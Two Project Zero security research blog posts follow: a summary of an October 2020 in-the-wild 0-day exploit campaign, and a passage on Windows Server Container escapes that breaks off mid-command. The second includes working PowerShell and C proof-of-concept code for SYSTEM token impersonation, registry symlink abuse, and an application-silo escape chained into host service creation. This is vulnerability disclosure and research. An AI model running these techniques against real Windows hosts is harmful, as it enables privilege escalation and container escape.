
In-the-Wild Series: October 2020 0-day discovery

18 March 2021 at 16:45

Posted by Maddie Stone, Project Zero

In October 2020, Google Project Zero discovered seven 0-day exploits being actively used in-the-wild. These exploits were delivered via "watering hole" attacks in a handful of websites pointing to two exploit servers that hosted exploit chains for Android, Windows, and iOS devices. These attacks appear to be the next iteration of the campaign discovered in February 2020 and documented in this blog post series.

In this post we are summarizing the exploit chains we discovered in October 2020. We have already published the details of the seven 0-day vulnerabilities exploited in our root cause analysis (RCA) posts. This post aims to provide the context around these exploits.

What happened

In October 2020, we discovered that the actor from the February 2020 campaign came back with the next iteration of their campaign: a couple dozen websites redirecting to an exploit server. Once our analysis began, we discovered links to a second exploit server on the same website. After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers.

In our testing, both of the exploit servers existed on all of the discovered domains. A summary of the two exploit servers is below:

Exploit server #1:

  • Initially responded to only iOS and Windows user-agents
  • Remained up and active for over a week from when we first started pulling exploits
  • Replaced the Chrome renderer RCE with a new v8 0-day (CVE-2020-16009) after the initial one (CVE-2020-15999) was patched
  • Briefly responded to Android user-agents after exploit server #2 went down (though we were only able to get the new Chrome renderer RCE)

Exploit server #2:

  • Responded to Android user-agents
  • Remained up and active for ~36 hours from when we first started pulling exploits
  • In our experience, responded to a much smaller block of IP addresses than exploit server #1

A device connecting to one of the affected websites was directed to either exploit server #1 or exploit server #2. The following exploits were then delivered based on the device and browser:

Exploit server #1, iOS, Safari:

  • Renderer RCE: Stack R/W via Type 1 Fonts (CVE-2020-27930)
  • Sandbox Escape: Not needed
  • Local Privilege Escalation: Info leak via mach message trailers (CVE-2020-27950), Type confusion with turnstiles (CVE-2020-27932)

Exploit server #1, Windows, Chrome:

  • Renderer RCE: Freetype heap buffer overflow (CVE-2020-15999)
  • Sandbox Escape: Not needed
  • Local Privilege Escalation: cng.sys heap buffer overflow (CVE-2020-17087)

Exploit server #1, Android, Chrome (only delivered after exploit server #2 went down and CVE-2020-15999 was patched):

  • Renderer RCE: V8 type confusion in TurboFan (CVE-2020-16009)
  • Sandbox Escape: Unknown
  • Local Privilege Escalation: Unknown

Exploit server #2, Android, Chrome:

  • Renderer RCE: Freetype heap buffer overflow (CVE-2020-15999)
  • Sandbox Escape: Chrome for Android heap buffer overflow (CVE-2020-16010)
  • Local Privilege Escalation: Unknown

Exploit server #2, Android, Samsung Browser:

  • Renderer RCE: Freetype heap buffer overflow (CVE-2020-15999)
  • Sandbox Escape: Chromium n-day
  • Local Privilege Escalation: Unknown

All of the platforms employed obfuscation and anti-analysis checks, but each platform's obfuscation was different. For example, iOS is the only platform whose exploits were encrypted with ephemeral keys, meaning that the exploits couldn't be recovered from the packet dump alone, instead requiring an active MITM on our side to rewrite the exploit on-the-fly.

These operational exploits also led us to believe that while the entities behind exploit servers #1 and #2 are different, they are likely working in a coordinated fashion. Both exploit servers used the Chrome Freetype RCE (CVE-2020-15999) as the renderer exploit for Windows (exploit server #1) and Android (exploit server #2), but the code that surrounded these exploits was quite different. The fact that the two servers went down at different times also leads us to believe that there were two distinct operators.

The exploits

In total, we collected:

  • 1 full chain targeting fully patched Windows 10 using Google Chrome
  • 2 partial chains targeting 2 different fully patched Android devices running Android 10 using Google Chrome and Samsung Browser, and
  • RCE exploits for iOS 11-13 and a privilege escalation exploit for iOS 13 (though the vulnerabilities were present up to iOS 14.1)

*Note: iOS, Android, and Windows were the only platforms we tested while the servers were still active. The lack of other exploit chains does not mean that those chains did not exist.

The seven 0-days exploited by this attacker are listed below. We’ve provided the technical details of each of the vulnerabilities and their exploits in the root cause analyses.

We were not able to collect any Android local privilege escalations prior to exploit server #2 being taken down. Exploit server #1 stayed up longer, and we were able to retrieve the privilege escalation exploits for iOS.

The vulnerabilities cover a fairly broad spectrum of issues - from a modern JIT vulnerability to a large cache of font bugs. Overall, each of the exploits showed an expert understanding of exploit development and of the vulnerability being exploited. In the case of the Chrome Freetype 0-day, the exploitation method was novel to Project Zero. The process to figure out how to trigger the iOS kernel privilege vulnerability would have been non-trivial. The obfuscation methods were varied and time-consuming to figure out.

Conclusion

Project Zero closed out 2020 with lots of long days analyzing lots of 0-day exploit chains and seven 0-day exploits. When combined with their earlier 2020 operation, the actor used at least 11 0-days in less than a year. We are so thankful to all of the vendors and defensive response teams who worked their own long days to analyze our reports and get patches released and applied.

Who Contains the Containers?

1 April 2021 at 16:06

Posted by James Forshaw, Project Zero

This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container, which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.

Diagram of a server silo. Shows an application interacting with the registry, object manager and network and how being in the silo redirects that access to another location.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.

For example, the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization, and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.

Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.

There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.

Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.

Diagram comparing Windows Server Containers and Hyper-V Isolated Containers. The server container on the left directly accesses the host’s kernel. For Hyper-V the container accesses a virtualized kernel, which dispatches to the hypervisor and then back to the original host kernel. This shows the additional security boundary in place to make Hyper-V isolated containers more secure.

The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers, meaning an escape is still useful as part of a chain.

As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.

Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks, on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global, which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers.

Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.

The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done more easily, without injection: you could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.
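For illustration, here’s a rough C sketch of that in-process approach (my own sketch, not the actual PoC, which is the PowerShell script linked above). It assumes you’re already an administrator and that system_pid, a hypothetical parameter, identifies some process running as SYSTEM:

// Sketch: duplicate a SYSTEM process token and impersonate it on the
// current thread, instead of injecting code into a SYSTEM process.
#include <windows.h>

BOOL ImpersonateSystemFromPid(DWORD system_pid) {
    HANDLE process = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION,
                                 FALSE, system_pid);
    if (!process) return FALSE;

    HANDLE token = NULL;
    BOOL ok = OpenProcessToken(process, TOKEN_DUPLICATE, &token);
    CloseHandle(process);
    if (!ok) return FALSE;

    // Duplicate the primary token into an impersonation token.
    HANDLE imp_token = NULL;
    ok = DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL,
                          SecurityImpersonation, TokenImpersonation,
                          &imp_token);
    CloseHandle(token);
    if (!ok) return FALSE;

    // The current thread now runs as SYSTEM; privileges present in the
    // token, such as SeTcbPrivilege, can then be enabled on it.
    ok = SetThreadToken(NULL, imp_token);
    CloseHandle(imp_token);
    return ok;
}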

Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.

Microsoft had not patched the issue, as they do not consider these issues to be serviceable, so it was still exploitable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce that the containers run under the ContainerUser account instead of ContainerAdministrator. As the reported issue only works when running as an administrator, that would seem to be sufficient.

However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.

While I wasn’t expecting MS to fix anything I found, the research would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It would also establish a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it’s best to just use Docker, which takes the MS-provided Go wrapper and implements the more familiar Docker CLI. While there are likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise, which is only for server systems, and Desktop. I primarily used Desktop for convenience.

As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:

FROM mcr.microsoft.com/windows/servercore:20H2
USER ContainerUser
COPY NtObjectManager c:/NtObjectManager
CMD [ "powershell", "-noexit", "-command", \
  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.

Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to the filename dockerfile in that directory. Also copy my PowerShell module into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.

C:\container> docker build -t test_image .
Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2
 ---> b29adf5cd4f0
Step 2/4 : USER ContainerUser
 ---> Running in ac03df015872
Removing intermediate container ac03df015872
 ---> 31b9978b5f34
Step 3/4 : COPY NtObjectManager c:/NtObjectManager
 ---> fa42b3e6a37f
Step 4/4 : CMD [ "powershell", "-noexit", "-command",   "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]
 ---> Running in 86cad2271d38
Removing intermediate container 86cad2271d38
 ---> e7d150417261
Successfully built e7d150417261
Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image
PS>

I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-Process -Name CExecSvc

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     86       6     1044       5020                4560   6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.

PS> Show-NtTokenEffective -User -Group -Privilege

USER INFORMATION
----------------
Name                       Sid
----                       ---
User Manager\ContainerUser S-1-5-93-2-2

GROUP SID INFORMATION
---------------------
Name                                   Attributes
----                                   ----------
Mandatory Label\High Mandatory Level   Integrity, ...
Everyone                               Mandatory, ...
BUILTIN\Users                          Mandatory, ...
NT AUTHORITY\SERVICE                   Mandatory, ...
CONSOLE LOGON                          Mandatory, ...
NT AUTHORITY\Authenticated Users       Mandatory, ...
NT AUTHORITY\This Organization         Mandatory, ...
NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...
LOCAL                                  Mandatory, ...
User Manager\AllContainers             Mandatory, ...

PRIVILEGE INFORMATION
---------------------
Name                          Luid              Enabled
----                          ----              -------
SeChangeNotifyPrivilege       00000000-00000017 True
SeImpersonatePrivilege        00000000-0000001D True
SeCreateGlobalPrivilege       00000000-0000001E True
SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn’t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system including administrators. MSRC considers having SeImpersonatePrivilege as administrator equivalent, meaning if you have it you can assume you can get to administrator. Seems ContainerUser is not quite as normal as it should be.

That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.

Next, I used the NtObject drive provider to list the object manager namespace. For example, checking the Device directory shows what device objects are available.

PS> ls NtObject:\Device

Name                                              TypeName
----                                              --------
Ip                                                SymbolicLink
Tcp6                                              SymbolicLink
Http                                              Directory
Ip6                                               SymbolicLink
ahcache                                           SymbolicLink
WMIDataDevice                                     SymbolicLink
LanmanDatagramReceiver                            SymbolicLink
Tcp                                               SymbolicLink
LanmanRedirector                                  SymbolicLink
DxgKrnl                                           SymbolicLink
ConDrv                                            SymbolicLink
Null                                              SymbolicLink
MailslotRedirector                                SymbolicLink
NamedPipe                                         Device
Udp6                                              SymbolicLink
VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink
KsecDD                                            SymbolicLink
DeviceApi                                         SymbolicLink
MountPointManager                                 Device
...

Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.

PS> ls HKLM:\SOFTWARE | Select-Object Name

Name

----

HKEY_LOCAL_MACHINE\SOFTWARE\Classes

HKEY_LOCAL_MACHINE\SOFTWARE\Clients

HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft

HKEY_LOCAL_MACHINE\SOFTWARE\ODBC

HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH

HKEY_LOCAL_MACHINE\SOFTWARE\Policies

HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications

HKEY_LOCAL_MACHINE\SOFTWARE\Setup

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node

PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name

Name

----

Classes

Clients

DefaultUserEnvironment

Docker Inc.

Intel

Macromedia

Microsoft

ODBC

OEM

OpenSSH

Partner

Policies

RegisteredApplications

Windows

WOW6432Node

The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> ls NtObject:\REGISTRY\USER | Select-Object Name

Name

----

.DEFAULT

S-1-5-19

S-1-5-20

S-1-5-21-426062036-3400565534-2975477557-1001

S-1-5-21-426062036-3400565534-2975477557-1001_Classes

S-1-5-21-426062036-3400565534-2975477557-1003

S-1-5-18

PS> Get-NtSid

Name                       Sid
----                       ---

User Manager\ContainerUser S-1-5-93-2-2

No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, so you’d expect to see a loaded hive for that user SID. However you don’t see one; instead you see S-1-5-21-426062036-3400565534-2975477557-1001, which is the SID of the user outside the container.

Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.
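To make the difference concrete, here’s a minimal C sketch of the relative open style using the native API (my illustration of the pattern, not the module’s actual code). Inside the silo, an open of this shape reached the real host hive rather than the overlay:

// Absolute open: \REGISTRY\MACHINE\SOFTWARE in one call (what the Win32
// APIs effectively do); this honored the registry overlay.
// Relative open: open \REGISTRY first, then MACHINE\SOFTWARE relative to
// that handle; this ignored the overlay inside the silo.
#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

#ifndef OBJ_CASE_INSENSITIVE
#define OBJ_CASE_INSENSITIVE 0x00000040
#endif
#ifndef NT_SUCCESS
#define NT_SUCCESS(s) (((NTSTATUS)(s)) >= 0)
#endif

// NtOpenKey isn't declared in winternl.h, so declare it ourselves.
NTSTATUS NTAPI NtOpenKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess,
                         POBJECT_ATTRIBUTES ObjectAttributes);

HANDLE OpenSoftwareKeyRelative(void) {
    UNICODE_STRING root_name, sub_name;
    OBJECT_ATTRIBUTES attr;
    HANDLE root = NULL, key = NULL;

    RtlInitUnicodeString(&root_name, L"\\REGISTRY");
    InitializeObjectAttributes(&attr, &root_name, OBJ_CASE_INSENSITIVE,
                               NULL, NULL);
    if (!NT_SUCCESS(NtOpenKey(&root, KEY_READ, &attr)))
        return NULL;

    // Relative open from the \REGISTRY handle.
    RtlInitUnicodeString(&sub_name, L"MACHINE\\SOFTWARE");
    InitializeObjectAttributes(&attr, &sub_name, OBJ_CASE_INSENSITIVE,
                               root, NULL);
    NtOpenKey(&key, KEY_READ, &attr);
    NtClose(root);
    return key;
}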

This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.

The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While basic inspection had been surprisingly fruitful, it was likely that some reverse engineering would be needed to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection work when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos, but the two take similar approaches.

The main enforcement mechanism used by the kernel to provide the container’s isolation is to call a function which checks whether the process is in a silo and do something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state. Unfortunately you’d be wrong; the following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:

  1. We’re only checking for bad checks, not the lack of a check.
  2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
  3. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink, which is the function responsible for enforcing symbolic link checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.

For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive, CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {
  if (PsIsCurrentThreadInServerSilo()
      || !TargetHive
      || TargetHive == SourceHive) {
    return TRUE;
  }
  if (SourceHive->Flags.Trusted)
    return FALSE;
  // Check trust list.
}

Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check, so it is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted, so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.
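For reference, planting such a registry symbolic link is straightforward with the native API. A minimal C sketch of the standard technique (error handling elided; not the exact code I used):

// Create a link key and point it at a target via the special
// SymbolicLinkValue value. Inside a server silo, CmpOKToFollowLink above
// lets this link cross from an untrusted hive into a trusted one.
#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

#ifndef OBJ_CASE_INSENSITIVE
#define OBJ_CASE_INSENSITIVE 0x00000040
#endif

NTSTATUS NTAPI NtCreateKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess,
                           POBJECT_ATTRIBUTES ObjectAttributes,
                           ULONG TitleIndex, PUNICODE_STRING Class,
                           ULONG CreateOptions, PULONG Disposition);
NTSTATUS NTAPI NtSetValueKey(HANDLE KeyHandle, PUNICODE_STRING ValueName,
                             ULONG TitleIndex, ULONG Type, PVOID Data,
                             ULONG DataSize);

// link_path is a native path to the key to create (e.g. under the user
// hive); target_path is e.g. L"\\REGISTRY\\MACHINE\\SOFTWARE\\...".
NTSTATUS CreateRegistrySymlink(PCWSTR link_path, PCWSTR target_path) {
    UNICODE_STRING name, value_name, target;
    OBJECT_ATTRIBUTES attr;
    HANDLE key = NULL;
    NTSTATUS status;

    RtlInitUnicodeString(&name, link_path);
    InitializeObjectAttributes(&attr, &name, OBJ_CASE_INSENSITIVE,
                               NULL, NULL);
    NtCreateKey(&key, KEY_ALL_ACCESS, &attr, 0, NULL,
                REG_OPTION_CREATE_LINK, NULL);

    RtlInitUnicodeString(&value_name, L"SymbolicLinkValue");
    RtlInitUnicodeString(&target, target_path);
    // REG_LINK value data is the target path without a null terminator.
    status = NtSetValueKey(key, &value_name, 0, REG_LINK,
                           target.Buffer, target.Length);
    NtClose(key);
    return status;
}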

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.

POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) {
  if (Silo) {
    PPSP_STORAGE Storage = Silo->Storage;
    PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];
    if (Slot->Present)
      return Slot->Value;
  }
  return ObpRootDirectoryObject;
}

We can see that the function will extract a storage parameter from the passed-in silo; if the slot is present it will return the slot’s value. If the silo is NULL or the slot isn’t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory, so this function should always return the silo root directory rather than the real global root directory.

This code seems perfectly fine: if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough; there are only two callers and they both have the following code.

PEJOB silo = PsGetCurrentSilo();
Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo);

Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo() {
  PETHREAD Thread = PsGetCurrentThread();
  PEJOB silo = Thread->Silo;
  if (silo == (PEJOB)-3) {
    silo = Thread->Tcb.Process->Job;
    while (silo) {
      if (silo->JobFlags & EJOB_SILO) {
        break;
      }
      silo = silo->ParentJob;
    }
  }
  return silo;
}

A silo can be associated with a thread through impersonation, or it can be one of the jobs in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches the job hierarchy of the process for any job which has the EJOB_SILO flag set. If a silo is found, it’s returned from the function, otherwise NULL is returned.

This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager into using the real root directory all we need to do is:

  1. Create an application silo.
  2. Assign it to a process.
  3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability, but requires no administrator privileges to function. Again, as with the registry issue, you’re still limited in what you can modify outside of the container based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.

The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $root = Get-NtDirectory "\"
PS> $root.FullPath
\
PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory
PS> Set-NtProcessJob $silo -Current
PS> $root.FullPath
\Silos\748

To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.

We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code from trying to create a root directory, which we don’t want and which can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.

Now we can check the root directory path again. We find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the real root directory. At this point you can access resources on the host through the object manager.

Chaining the Exploits

We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM; you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) using the ALPC port to create a new service. You don’t even need to copy an executable outside the container, as the system volume for the container is an accessible device on the host which we can just access.

As far as the host’s SCM is concerned you’re an administrator and so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run on the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is that the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service, you will end up accessing the container’s SCM, not the host’s.

To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $imp = $token.Impersonate()
PS> $sym_path = "$env:SystemDrive\symbols"
PS> mkdir $sym_path | Out-Null
PS> $services_path = "$env:SystemRoot\system32\services.exe"
PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'
# You can also use the following to run a container based executable.
#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {
#   "\\.\GLOBALROOT" + $f.FullPath
#}
PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path
PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path |
   Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'
PS> $client = Get-RpcClient $rpc
PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory
PS> Set-NtProcessJob $silo -Current
PS> Connect-RpcClient $client -EndpointPath ntsvcs
PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `
 [NullString]::Value, `
 [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)
PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `
